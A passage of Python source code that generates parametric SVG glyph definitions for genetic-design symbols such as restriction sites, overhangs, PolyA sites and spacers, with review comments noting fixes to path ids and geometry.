        'pad_bottom': 3,
        # Glyph specific parameter
        'width': 20,
    }
    # Header: SVG element, bounding box and baseline.
    header_text = svg_header('OriginOfTransfer', 'SO:0000724', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(width/2.0)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+width+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Three paths: the filled circular body, the diagonal arrow body, and the
    # arrowhead.  style_text is keyed by the same names used for 'class'.
    glyph_paths = []
    for path_class, path_id, d_spec in (
            ('filled-path', 'origin-of-transfer', 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)} C{baseline_x+pad_before},{(baseline_y-baseline_offset)-(width/1.5)} {baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width/1.5)} {baseline_x+pad_before+width},{(baseline_y-baseline_offset)} C{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)+(width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)} Z'),
            ('unfilled-path', 'origin-of-transfer-arrowbody', 'M{baseline_x+pad_before+(width*0.5)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width*0.5)}'),
            ('unfilled-path', 'origin-of-transfer-arrowhead', 'M{baseline_x+pad_before+(width*0.85)},{(baseline_y-baseline_offset)-(width*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width*0.35)}')):
        entry = {'class': path_class, 'id': path_id, 'parametric:d': d_spec}
        entry['d'] = eval_parameterised_path(d_spec, params)
        entry['style'] = style_text[path_class]
        glyph_paths.append(entry)
    return header_text, glyph_paths
def sticky_restriction_site_5_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the SVG header text and glyph paths for a 5' Sticky
    Restriction Site glyph (SO:0001975): a step cut dropping left-to-right.

    Returns (header_text, glyph_paths); glyph_paths is a list of path dicts
    with 'class', 'id', 'parametric:d', 'd' and 'style' keys.
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 0
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # Sticky restriction site specific parameters
    params['width'] = 15
    params['height'] = 8
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('5\' Sticky Restriction Site', 'SO:0001975', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Background rectangle behind the step-cut line.
    # Fixed: removed the stray '-pad_top' from the top-right corner so the
    # background is a plain rectangle at +/- height*0.5, and removed the
    # stray '}' after 'Z'.
    bg_path = {}
    bg_path['class'] = 'filled-background-path'
    bg_path['id'] = 'sticky-restriction-site-background'
    bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z'
    bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
    bg_path['style'] = style_text['filled-background-path']
    glyph_paths.append(bg_path)
    # Step-cut line: down from the top edge, across the baseline, down to the
    # bottom edge (5' overhang orientation).
    sticky_restriction_site_path = {}
    sticky_restriction_site_path['class'] = 'unfilled-path'
    sticky_restriction_site_path['id'] = 'sticky-restriction-site-path'
    sticky_restriction_site_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.15)},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+(width*0.15)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width*0.85)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width*0.85)},{(baseline_y-baseline_offset)+(height*0.5)}'
    sticky_restriction_site_path['d'] = eval_parameterised_path(sticky_restriction_site_path['parametric:d'], params)
    sticky_restriction_site_path['style'] = style_text['unfilled-path']
    glyph_paths.append(sticky_restriction_site_path)
    return header_text, glyph_paths
def sticky_restriction_site_3_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the SVG header text and glyph paths for a 3' Sticky
    Restriction Site glyph (SO:0001976): a step cut rising left-to-right
    (mirror of the 5' variant).

    Returns (header_text, glyph_paths); glyph_paths is a list of path dicts
    with 'class', 'id', 'parametric:d', 'd' and 'style' keys.
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 0
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # Sticky restriction site specific parameters
    params['width'] = 15
    params['height'] = 8
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('3\' Sticky Restriction Site', 'SO:0001976', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Background rectangle behind the step-cut line.
    # Fixed: removed the stray '-pad_top' from the top-right corner so the
    # background is a plain rectangle at +/- height*0.5, and removed the
    # stray '}' after 'Z'.
    bg_path = {}
    bg_path['class'] = 'filled-background-path'
    bg_path['id'] = 'sticky-restriction-site-background'
    bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z'
    bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
    bg_path['style'] = style_text['filled-background-path']
    glyph_paths.append(bg_path)
    # Step-cut line: up from the bottom edge, across the baseline, up to the
    # top edge (3' overhang orientation; mirror of the 5' glyph).
    sticky_restriction_site_path = {}
    sticky_restriction_site_path['class'] = 'unfilled-path'
    sticky_restriction_site_path['id'] = 'sticky-restriction-site-path'
    sticky_restriction_site_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.15)},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+(width*0.15)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width*0.85)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width*0.85)},{(baseline_y-baseline_offset)-(height*0.5)}'
    sticky_restriction_site_path['d'] = eval_parameterised_path(sticky_restriction_site_path['parametric:d'], params)
    sticky_restriction_site_path['style'] = style_text['unfilled-path']
    glyph_paths.append(sticky_restriction_site_path)
    return header_text, glyph_paths
def overhang_site_5_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the parametric SVG for the 5' Overhang Site glyph (SO:0001932).

    Returns a tuple (header_text, glyph_paths): the SVG header string (svg,
    bounding box and baseline elements) and a list of path dictionaries, each
    holding 'class', 'id', 'parametric:d', evaluated 'd' and 'style' entries.
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 0
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # Unspecified component parameters
    params['width'] = 15
    params['height'] = 5
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('5\' Overhang Site', 'SO:0001932', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Generate the paths for the glyph and add to list of paths
    bg_path = {}
    bg_path['class'] = 'filled-background-path'
    bg_path['id'] = 'overhang_site-background'
    # NOTE(review): the '-pad_top' on the second corner and the trailing 'Z}'
    # match the other background paths in this file — confirm against
    # eval_parameterised_path whether the stray '}' is intentional.
    bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-pad_top-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z}'
    bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
    bg_path['style'] = style_text['filled-background-path']
    glyph_paths.append(bg_path)
    # Top strand: full-width horizontal line above the baseline
    overhang_scar_path1 = {}
    overhang_scar_path1['class'] = 'unfilled-path'
    overhang_scar_path1['id'] = 'overhang_site-path1'
    overhang_scar_path1['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)}'
    overhang_scar_path1['d'] = eval_parameterised_path(overhang_scar_path1['parametric:d'], params)
    overhang_scar_path1['style'] = style_text['unfilled-path']
    glyph_paths.append(overhang_scar_path1)
    # Bottom strand: recessed at the 5' end (starts at 40% of the width)
    overhang_scar_path2 = {}
    overhang_scar_path2['class'] = 'unfilled-path'
    # Fixed: id was 'overhang_site-path1', duplicating the first path's id
    # (SVG ids must be unique within a document)
    overhang_scar_path2['id'] = 'overhang_site-path2'
    overhang_scar_path2['parametric:d'] = 'M{baseline_x+pad_before+(width*0.4)},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)}'
    overhang_scar_path2['d'] = eval_parameterised_path(overhang_scar_path2['parametric:d'], params)
    overhang_scar_path2['style'] = style_text['unfilled-path']
    glyph_paths.append(overhang_scar_path2)
    return header_text, glyph_paths
def overhang_site_3_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the parametric SVG for the 3' Overhang Site glyph (SO:0001933).

    Returns a tuple (header_text, glyph_paths): the SVG header string (svg,
    bounding box and baseline elements) and a list of path dictionaries, each
    holding 'class', 'id', 'parametric:d', evaluated 'd' and 'style' entries.
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 0
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # Unspecified component parameters
    params['width'] = 15
    params['height'] = 5
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('3\' Overhang Site', 'SO:0001933', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Generate the paths for the glyph and add to list of paths
    bg_path = {}
    bg_path['class'] = 'filled-background-path'
    bg_path['id'] = 'overhang_site-background'
    bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-pad_top-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z}'
    bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
    bg_path['style'] = style_text['filled-background-path']
    glyph_paths.append(bg_path)
    # Top strand: full-width horizontal line above the baseline
    overhang_scar_path1 = {}
    overhang_scar_path1['class'] = 'unfilled-path'
    overhang_scar_path1['id'] = 'overhang_site-path1'
    overhang_scar_path1['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)}'
    overhang_scar_path1['d'] = eval_parameterised_path(overhang_scar_path1['parametric:d'], params)
    overhang_scar_path1['style'] = style_text['unfilled-path']
    glyph_paths.append(overhang_scar_path1)
    # Bottom strand: recessed at the 3' end (stops at 60% of the width)
    overhang_scar_path2 = {}
    overhang_scar_path2['class'] = 'unfilled-path'
    # Fixed: id was 'overhang_site-path1', duplicating the first path's id
    # (SVG ids must be unique within a document)
    overhang_scar_path2['id'] = 'overhang_site-path2'
    overhang_scar_path2['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+width-(width*0.4)},{(baseline_y-baseline_offset)+(height*0.5)}'
    overhang_scar_path2['d'] = eval_parameterised_path(overhang_scar_path2['parametric:d'], params)
    overhang_scar_path2['style'] = style_text['unfilled-path']
    glyph_paths.append(overhang_scar_path2)
    return header_text, glyph_paths
def signature_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Produce the Signature glyph (SO:0001978) as parametric SVG.

    Returns a tuple (header_text, glyph_paths): the SVG header string (svg,
    bounding box and baseline elements) and a list of path dictionaries.
    """
    # General parameters first, then the unspecified component parameters
    params = {
        'baseline_x': baseline_x,
        'baseline_y': baseline_y,
        'baseline_offset': 0,
        'pad_before': 2,
        'pad_after': 2,
        'pad_top': 3,
        'pad_bottom': 3,
        'width': 20,
        'height': 10,
    }
    # Header text: SVG element, bounding box and baseline
    header_text = svg_header('Signature', 'SO:0001978', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-height-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    def _make_path (path_class, path_id, parametric_d):
        # Assemble one path dictionary, evaluating its parametric geometry
        path = {}
        path['class'] = path_class
        path['id'] = path_id
        path['parametric:d'] = parametric_d
        path['d'] = eval_parameterised_path(parametric_d, params)
        path['style'] = style_text[path_class]
        return path
    # Paths: the signed box, the two strokes of the X mark, and the signing line
    glyph_paths = [
        _make_path('filled-path', 'signature-box-path',
                   'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-height} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-height} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)} {baseline_x+pad_before},{(baseline_y-baseline_offset)} Z'),
        _make_path('unfilled-path', 'signature-cross-path1',
                   'M{baseline_x+pad_before+(height*0.3)},{(baseline_y-baseline_offset)-height+(height*0.3)} L{baseline_x+pad_before+(height*0.7)},{(baseline_y-baseline_offset)-height+(height*0.7)}'),
        _make_path('unfilled-path', 'signature-cross-path2',
                   'M{baseline_x+pad_before+(height*0.3)},{(baseline_y-baseline_offset)-(height*0.3)} L{baseline_x+pad_before+(height*0.7)},{(baseline_y-baseline_offset)-(height*0.7)}'),
        _make_path('unfilled-path', 'signature-line-path',
                   'M{baseline_x+pad_before+height},{(baseline_y-baseline_offset)-(height*0.3)} L{baseline_x+pad_before+width-(height*0.3)},{(baseline_y-baseline_offset)-(height*0.3)}'),
    ]
    return header_text, glyph_paths
def poly_a_site_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the parametric SVG for the PolyA Site glyph (SO:0000553).

    The glyph is a zig-zag line with three short horizontal bars (stylised
    'AAA'). Returns a tuple (header_text, glyph_paths): the SVG header string
    and a list of path dictionaries.
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 0
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # Unspecified component parameters
    params['width'] = 20
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('PolyA Site', 'SO:0000553', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(width*0.3)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+(width*0.3)+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Generate the paths for the glyph and add to list of paths
    bg_path = {}
    bg_path['class'] = 'filled-background-path'
    bg_path['id'] = 'poly-a-site-background'
    bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(width*0.3)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-pad_top-(width*0.3)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(width*0.3)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(width*0.3)} Z}'
    bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
    bg_path['style'] = style_text['filled-background-path']
    glyph_paths.append(bg_path)
    # Zig-zag line: three peaks across the width of the glyph
    poly_a_site_path1 = {}
    poly_a_site_path1['class'] = 'unfilled-path'
    poly_a_site_path1['id'] = 'poly-a-site-path1'
    poly_a_site_path1['parametric:d'] = 'M{(baseline_x+pad_before)},{(baseline_y-baseline_offset)} L{(baseline_x+pad_before)+(width*(1.0/6.0))},{(baseline_y-baseline_offset)-(width*0.3)} L{(baseline_x+pad_before)+(width*0.333333)},{(baseline_y-baseline_offset)} L{(baseline_x+pad_before)+(width*(3.0/6.0))},{(baseline_y-baseline_offset)-(width*0.3)} L{(baseline_x+pad_before)+(width*0.66666)},{(baseline_y-baseline_offset)} L{(baseline_x+pad_before)+(width*(5.0/6.0))},{(baseline_y-baseline_offset)-(width*0.3)} L{(baseline_x+pad_before)+(width*1.0)},{(baseline_y-baseline_offset)}'
    poly_a_site_path1['d'] = eval_parameterised_path(poly_a_site_path1['parametric:d'], params)
    poly_a_site_path1['style'] = style_text['unfilled-path']
    glyph_paths.append(poly_a_site_path1)
    # Cross-bar of the first 'A'
    poly_a_site_path2 = {}
    poly_a_site_path2['class'] = 'unfilled-path'
    poly_a_site_path2['id'] = 'poly-a-site-path2'
    poly_a_site_path2['parametric:d'] = 'M{(baseline_x+pad_before)+(width*(0.7/12.0))},{(baseline_y-baseline_offset)-(width*0.3*0.3)} L{(baseline_x+pad_before)+(width*(3.3/12.0))},{(baseline_y-baseline_offset)-(width*0.3*0.3)}'
    poly_a_site_path2['d'] = eval_parameterised_path(poly_a_site_path2['parametric:d'], params)
    poly_a_site_path2['style'] = style_text['unfilled-path']
    glyph_paths.append(poly_a_site_path2)
    # Cross-bar of the second 'A'
    poly_a_site_path3 = {}
    poly_a_site_path3['class'] = 'unfilled-path'
    poly_a_site_path3['id'] = 'poly-a-site-path3'
    poly_a_site_path3['parametric:d'] = 'M{(baseline_x+pad_before)+(width*(4.7/12.0))},{(baseline_y-baseline_offset)-(width*0.3*0.3)} L{(baseline_x+pad_before)+(width*(7.3/12.0))},{(baseline_y-baseline_offset)-(width*0.3*0.3)}'
    poly_a_site_path3['d'] = eval_parameterised_path(poly_a_site_path3['parametric:d'], params)
    poly_a_site_path3['style'] = style_text['unfilled-path']
    glyph_paths.append(poly_a_site_path3)
    # Cross-bar of the third 'A'
    poly_a_site_path4 = {}
    poly_a_site_path4['class'] = 'unfilled-path'
    # Fixed: id was 'poly-a-site-path3', duplicating the previous path's id
    # (SVG ids must be unique within a document)
    poly_a_site_path4['id'] = 'poly-a-site-path4'
    poly_a_site_path4['parametric:d'] = 'M{(baseline_x+pad_before)+(width*(8.7/12.0))},{(baseline_y-baseline_offset)-(width*0.3*0.3)} L{(baseline_x+pad_before)+(width*(11.3/12.0))},{(baseline_y-baseline_offset)-(width*0.3*0.3)}'
    poly_a_site_path4['d'] = eval_parameterised_path(poly_a_site_path4['parametric:d'], params)
    poly_a_site_path4['style'] = style_text['unfilled-path']
    glyph_paths.append(poly_a_site_path4)
    return header_text, glyph_paths
def dna_location_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Produce the DNA Location glyph (SO:0001236, SO:0000699) as parametric SVG.

    The glyph is a map-pin: a filled ellipse on top of a vertical stem.
    Returns a tuple (header_text, glyph_paths): the SVG header string and a
    list of path dictionaries.
    """
    # General parameters, followed by the unspecified component parameters
    params = {
        'baseline_x': baseline_x,
        'baseline_y': baseline_y,
        'baseline_offset': 0,
        'pad_before': 2,
        'pad_after': 2,
        'pad_top': 3,
        'pad_bottom': 3,
        'top_width': 6,
        'stem_height': 10,
    }
    # Header text: SVG element, bounding box and baseline
    header_text = svg_header('DNA Location', 'SO:0001236,SO:0000699', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-stem_height-top_width-pad_top}', '{pad_before+top_width+pad_after}', '{pad_top+stem_height+top_width+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+top_width+pad_after}', params, style=style_text['baseline'])
    # Filled ellipse drawn with two cubic Bezier curves above the stem
    top_path = {
        'class': 'filled-path',
        'id': 'location-top-path',
        'parametric:d': 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(stem_height+(top_width*0.5))} C{baseline_x+pad_before},{(baseline_y-baseline_offset)-(stem_height+(top_width*0.5))-(top_width/1.5)} {baseline_x+pad_before+top_width},{(baseline_y-baseline_offset)-(stem_height+(top_width*0.5))-(top_width/1.5)} {baseline_x+pad_before+top_width},{(baseline_y-baseline_offset)-(stem_height+(top_width*0.5))} C{baseline_x+pad_before+top_width},{(baseline_y-baseline_offset)-(stem_height+(top_width*0.5))+(top_width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)-(stem_height+(top_width*0.5))+(top_width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)-(stem_height+(top_width*0.5))} Z',
    }
    top_path['d'] = eval_parameterised_path(top_path['parametric:d'], params)
    top_path['style'] = style_text['filled-path']
    # Vertical stem from the baseline up to the ellipse
    stem_path = {
        'class': 'unfilled-path',
        'id': 'location-stem-path',
        'parametric:d': 'M{baseline_x+pad_before+(top_width*0.5)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(top_width*0.5)},{(baseline_y-baseline_offset)-stem_height}',
    }
    stem_path['d'] = eval_parameterised_path(stem_path['parametric:d'], params)
    stem_path['style'] = style_text['unfilled-path']
    glyph_paths = [top_path, stem_path]
    return header_text, glyph_paths
def dna_cleavage_site_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the parametric SVG for the DNA Cleavage Site glyph
    (SO:0001688, SO:0001687).

    The glyph is an X mark (two crossing strokes) on top of a vertical stem.
    Returns a tuple (header_text, glyph_paths): the SVG header string and a
    list of path dictionaries.
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 0
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # Unspecified component parameters
    params['top_width'] = 6
    params['stem_height'] = 10
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('DNA Cleavage Site', 'SO:0001688,SO:0001687', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-stem_height-top_width-pad_top}', '{pad_before+top_width+pad_after}', '{pad_top+stem_height+top_width+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+top_width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Generate the paths for the glyph and add to list of paths
    # First stroke of the X (top-left to bottom-right)
    location_top_path1 = {}
    location_top_path1['class'] = 'unfilled-path'
    # Fixed: both strokes used the id 'location-top-path'; SVG ids must be
    # unique within a document, so number them like their sibling paths
    location_top_path1['id'] = 'location-top-path1'
    location_top_path1['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-stem_height-top_width} L{baseline_x+pad_before+top_width},{(baseline_y-baseline_offset)-stem_height}'
    location_top_path1['d'] = eval_parameterised_path(location_top_path1['parametric:d'], params)
    location_top_path1['style'] = style_text['unfilled-path']
    glyph_paths.append(location_top_path1)
    # Second stroke of the X (bottom-left to top-right)
    location_top_path2 = {}
    location_top_path2['class'] = 'unfilled-path'
    location_top_path2['id'] = 'location-top-path2'
    location_top_path2['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-stem_height} L{baseline_x+pad_before+top_width},{(baseline_y-baseline_offset)-stem_height-top_width}'
    location_top_path2['d'] = eval_parameterised_path(location_top_path2['parametric:d'], params)
    location_top_path2['style'] = style_text['unfilled-path']
    glyph_paths.append(location_top_path2)
    # Vertical stem from the baseline up to the centre of the X
    location_stem_path = {}
    location_stem_path['class'] = 'unfilled-path'
    location_stem_path['id'] = 'location-stem-path'
    location_stem_path['parametric:d'] = 'M{baseline_x+pad_before+(top_width*0.5)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(top_width*0.5)},{(baseline_y-baseline_offset)-stem_height-(top_width*0.5)}'
    location_stem_path['d'] = eval_parameterised_path(location_stem_path['parametric:d'], params)
    location_stem_path['style'] = style_text['unfilled-path']
    glyph_paths.append(location_stem_path)
    return header_text, glyph_paths
def dna_stability_element_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the parametric SVG for the DNA Stability Element glyph.

    The glyph is a filled shield-like pentagon on top of a vertical stem.
    Returns a tuple (header_text, glyph_paths): the SVG header string and a
    list of path dictionaries.
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 0
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # Unspecified component parameters
    params['top_width'] = 6
    params['stem_height'] = 10
    # Make the header text (SVG, bounding box, and baseline elements)
    # Fixed: the title previously read 'DNA Cleavage Site', copied from the
    # dna_cleavage_site_svg function above. NOTE(review): the SO terms are
    # still identical to the cleavage-site glyph's — confirm the correct
    # Sequence Ontology terms for a DNA stability element.
    header_text = svg_header('DNA Stability Element', 'SO:0001688,SO:0001687', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-stem_height-top_width-pad_top}', '{pad_before+top_width+pad_after}', '{pad_top+stem_height+top_width+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+top_width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Generate the paths for the glyph and add to list of paths
    # Filled shield shape above the stem
    location_top_path = {}
    location_top_path['class'] = 'filled-path'
    location_top_path['id'] = 'location-top-path'
    location_top_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-stem_height-top_width} L{baseline_x+pad_before+top_width},{(baseline_y-baseline_offset)-stem_height-top_width} L{baseline_x+pad_before+top_width},{(baseline_y-baseline_offset)-stem_height-(top_width*0.3)} L{baseline_x+pad_before+(top_width*0.5)},{(baseline_y-baseline_offset)-stem_height} L{baseline_x+pad_before},{(baseline_y-baseline_offset)-stem_height-(top_width*0.3) } Z'
    location_top_path['d'] = eval_parameterised_path(location_top_path['parametric:d'], params)
    location_top_path['style'] = style_text['filled-path']
    glyph_paths.append(location_top_path)
    # Vertical stem from the baseline up to the shield
    location_stem_path = {}
    location_stem_path['class'] = 'unfilled-path'
    location_stem_path['id'] = 'location-stem-path'
    location_stem_path['parametric:d'] = 'M{baseline_x+pad_before+(top_width*0.5)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(top_width*0.5)},{(baseline_y-baseline_offset)-stem_height}'
    location_stem_path['d'] = eval_parameterised_path(location_stem_path['parametric:d'], params)
    location_stem_path['style'] = style_text['unfilled-path']
    glyph_paths.append(location_stem_path)
    return header_text, glyph_paths
def spacer_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the parametric SVG for the Spacer glyph (SO:0000031).

    The glyph is a circle (two cubic Bezier curves) centred on the baseline
    with an X drawn through it. Returns a tuple (header_text, glyph_paths):
    the SVG header string and a list of path dictionaries.
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 0
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # Unspecified component parameters
    params['width'] = 10
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('Spacer', 'SO:0000031', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(width*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+width+pad_bottom}', params, style=style_text['bounding-box'])
